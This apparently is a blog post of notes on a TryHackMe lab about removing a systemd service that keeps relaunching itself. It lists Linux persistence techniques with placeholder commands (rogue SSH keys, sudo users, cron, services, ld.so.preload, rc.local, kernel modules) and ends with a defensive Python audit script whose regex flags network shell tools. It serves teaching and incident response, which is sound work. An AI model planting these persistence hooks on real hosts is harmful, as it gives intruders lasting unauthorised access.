Dec 18 18:39:18 tryhackme systemd[1]: Started Unkillable exe.
Dec 18 18:39:18 tryhackme sudo[589]:     root : TTY=unknown ; PWD=/ ; USER=root>
Dec 18 18:39:18 tryhackme sudo[589]: pam_unix(sudo:session): session opened for>
Dec 18 18:39:18 tryhackme sudo[692]: Merry Christmas
Dec 18 18:41:06 tryhackme sudo[1852]: Merry Christmas
Dec 18 18:45:00 tryhackme systemd[1]: Stopping Unkillable exe...
Dec 18 18:45:00 tryhackme sudo[589]: pam_unix(sudo:session): session closed for>
Dec 18 18:45:00 tryhackme systemd[1]: a-unkillable.service: Succeeded.
Dec 18 18:45:00 tryhackme systemd[1]: Stopped Unkillable exe.

root@tryhackme:/home/ubuntu# rm -rf /etc/systemd/system/a
root@tryhackme:/home/ubuntu# rm -rf /etc/systemd/system/a-unkillable.service
root@tryhackme:/home/ubuntu# systemctl status a-unkillable.service
Unit a-unkillable.service could not be found.
root@tryhackme:/home/ubuntu# systemctl daemon-reload
root@tryhackme:/home/ubuntu# 

Top vs Process (ps)

  • ps: a one-shot snapshot; “ps aux” lists every process, and “ps -o pid,ppid,user,cmd -p <pid>” shows who spawned a given one
  • top: a live view sorted by resource consumption, which is what surfaced PID 683 (“a”) at 100% CPU here

Killing that PID alone did not work: the wrapper process inside the unit's cgroup (PID 666 in the systemctl status output) simply relaunched it as PID 1848. Eradication therefore means walking up to the unit: stop it, disable it, delete the unit file and the binary, then daemon-reload so systemd forgets it.

Ways Attackers Could Gain Persistence on a Server

Common Techniques:

  1. Modify a user account to gain access:
    • Add a rogue SSH key: appending the attacker's public key to a user's “.ssh/authorized_keys” allows login without a password, and without touching the password, PAM or any log-in policy.

      echo "ssh-rsa [ATTACKER_PUBLIC_KEY]" >> ~/.ssh/authorized_keys

    • Modify the “.bashrc” file: commands appended to a user's “.bashrc” run every time that user opens an interactive shell.

      echo "malicious_command" >> ~/.bashrc

  2. Create a privileged account:
    • A new account in the sudo group (or with UID 0 in /etc/passwd) gives the attacker a login that survives a password reset of the compromised user.

      sudo useradd -m -G sudo malicious_user
      sudo passwd malicious_user

  3. Start a process that keeps running:
    • A process detached from the terminal survives logout but not a reboot, so on its own it is weak persistence and is usually paired with one of the mechanisms below.

      nohup malicious_process &

  4. Set up a cron job:
    • A cron job re-executes a script on a schedule or at boot (@reboot, as in the ubuntu crontab above), recreating access even after the running process is killed. Edit the crontab with:

      crontab -e

      and add a schedule line such as (the every-minute schedule here is only an example):

      * * * * * /path/to/malicious_script.sh

  5. Install a service:
    • A unit file dropped into /etc/systemd/system, like a-unkillable.service above, is started by systemd at every boot, and with Restart=always systemd itself relaunches it whenever it is killed. Enable it once and it is back after every reboot:

      sudo systemctl enable --now malicious.service

Uncommon Techniques (not tested yet):

  1. Kernel module rootkit:
    • A loadable kernel module runs in ring 0 and can hide processes, files and network connections from every userland tool (top and ps included). insmod only lasts until the next reboot; to persist, the module also has to be registered for loading at boot (e.g. via /etc/modules-load.d/) or built into the initramfs.

      # Load a malicious kernel module (gone at reboot unless also registered to load at boot)
      sudo insmod malicious_module.ko

  2. Backdoor in system libraries:
    • Appending bytes to libc.so.6 achieves nothing, because nothing ever executes data tacked onto the end of an ELF file. The working variant is a separate shared object that the dynamic loader injects into every dynamically linked program, registered through the loader's preload file. /etc/ld.so.preload and LD_PRELOAD settings in environment files are therefore worth checking during triage.

      # Register a shared object to be injected into every dynamically linked process
      echo "/path/to/malicious.so" >> /etc/ld.so.preload

  3. Tamper with system startup scripts:
    • Commands appended to /etc/rc.local (where the distribution still runs it, via rc-local.service) or to another boot-time script execute as root on every boot.

      # Add a malicious command to a system startup script
      echo "malicious_command" >> /etc/rc.local

  4. Steganography:
    • Hiding a payload inside an image or audio file only conceals it; the hidden bytes do not run by themselves. Persistence still needs a small stage (a cron entry, a line in an rc file) that extracts and executes the hidden part, so the innocuous-looking file is a place to look, not the mechanism.

      # Append a payload to a JPEG: viewers ignore trailing data, a loader script extracts it later
      cat payload.sh >> innocent_image.jpg

  5. Exploiting vulnerable software:
    • Re-exploiting a known vulnerability in an exposed service gives the attacker a way back in for as long as the patch is missing, even after every planted artefact has been removed, which is why patching belongs to eradication.

      # Re-run an exploit against an unpatched service (placeholder name, no specific vulnerability implied)
      exploit-apache-vulnerability.py

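The Day 18 procedure above (top to find the process, systemctl status to find the unit behind it, crontab -l to rule out cron) and the two persistence lists share one defensive question: which startup hooks on this host would bring an attacker back? The Python below is an added example, not part of the room or of these notes. It audits the places the lists name, admin-created units in /etc/systemd/system, per-user and system crontabs, authorized_keys files and shell rc files, over a constructed fake root so it runs offline; the a-unkillable.service contents are reconstructed from the systemctl status output on this page (the real file is not shown), the ubuntu crontab lines are the ones printed above, and the SSH key, the .bashrc line and the benign backup.service are constructed. The indicator regex is an assumption and deliberately coarse.

```python
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Indicators in a startup hook that deserve a look: privilege wrappers, download/decode chains,
# payloads parked in world-writable directories or inside the unit directory itself.
SUSPICIOUS = re.compile(
    r"\b(sudo|nohup|curl|wget|base64|nc|ncat|socat)\b|/dev/shm/|/tmp/|/etc/systemd/system/"
)


def _lines(path: Path) -> list[str]:
    """Non-empty, non-comment lines of a file that may not exist."""
    if not path.is_file():
        return []
    return [l for l in path.read_text().splitlines() if l.strip() and not l.lstrip().startswith("#")]


def audit_units(root: Path) -> list[str]:
    """Admin-created units (/etc/systemd/system) whose ExecStart looks like a loader, not a daemon."""
    findings = []
    for unit in sorted((root / "etc/systemd/system").glob("*.service")):
        for line in _lines(unit):
            if line.startswith("ExecStart=") and SUSPICIOUS.search(line):
                findings.append(f"unit {unit.name}: {line}")
    return findings


def audit_cron(root: Path) -> list[str]:
    """@reboot entries and suspicious commands in per-user crontabs, /etc/crontab and /etc/cron.d."""
    findings = []
    files = [root / "etc/crontab"]
    for d in ("var/spool/cron/crontabs", "etc/cron.d"):
        files += sorted((root / d).glob("*")) if (root / d).is_dir() else []
    for f in files:
        for line in _lines(f):
            if line.startswith("@reboot") or SUSPICIOUS.search(line):
                findings.append(f"cron {f.name}: {line}")
    return findings


def audit_homes(root: Path) -> list[str]:
    """Every authorized_keys entry (each one is a password-less login) and suspicious rc-file lines."""
    findings = []
    for home in sorted((root / "home").glob("*")):
        for line in _lines(home / ".ssh/authorized_keys"):
            findings.append(f"sshkey {home.name}: {line.split()[-1]}")  # report the key comment
        for rc in (".bashrc", ".profile"):
            for line in _lines(home / rc):
                if SUSPICIOUS.search(line):
                    findings.append(f"rc {home.name}/{rc}: {line}")
    return findings


def audit(root: Path) -> list[str]:
    """Run all checks; point root at Path('/') on a real host (reading crontabs needs root)."""
    return audit_units(root) + audit_cron(root) + audit_homes(root)


def build_sample_host() -> Path:
    """Constructed fake root for an offline run, modelled on the outputs earlier on this page."""
    root = Path(tempfile.mkdtemp())
    for d in ("etc/systemd/system", "etc/cron.d", "var/spool/cron/crontabs", "home/ubuntu/.ssh"):
        (root / d).mkdir(parents=True)
    # Unit reconstructed from the systemctl status output above (the real file is not on the page).
    (root / "etc/systemd/system/a-unkillable.service").write_text(
        "[Unit]\nDescription=Unkillable exe\n\n[Service]\n"
        "ExecStart=/usr/bin/sudo /etc/systemd/system/a service\n\n[Install]\nWantedBy=multi-user.target\n"
    )
    # Constructed benign admin-created unit: must not be reported.
    (root / "etc/systemd/system/backup.service").write_text(
        "[Unit]\nDescription=Nightly backup\n\n[Service]\nExecStart=/usr/local/bin/backup.sh\n"
    )
    # The ubuntu crontab shown above; both entries run at boot through sudo, so both are reported.
    (root / "var/spool/cron/crontabs/ubuntu").write_text(
        "@reboot sudo runuser -l ubuntu -c 'vncserver :1 -depth 24 -geometry 1900x1200'\n"
        "@reboot sudo python3 -m websockify 80 localhost:5901 -D\n"
    )
    # Constructed: a planted key (not a real key) and a backgrounded loader appended to .bashrc.
    (root / "home/ubuntu/.ssh/authorized_keys").write_text(
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyNotReal attacker@example\n"
    )
    (root / "home/ubuntu/.bashrc").write_text("alias ll='ls -la'\n(nohup /dev/shm/.a >/dev/null 2>&1 &)\n")
    return root


if __name__ == "__main__":
    for finding in audit(build_sample_host()):
        print(finding)
```

The two @reboot lines from the lab's own crontab are reported as well: they are the VNC setup of the machine, not the implant, which is the point of an audit like this. It shortlists what to look at, and a human still has to decide what belongs.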
This post is licensed under CC BY 4.0 by the author.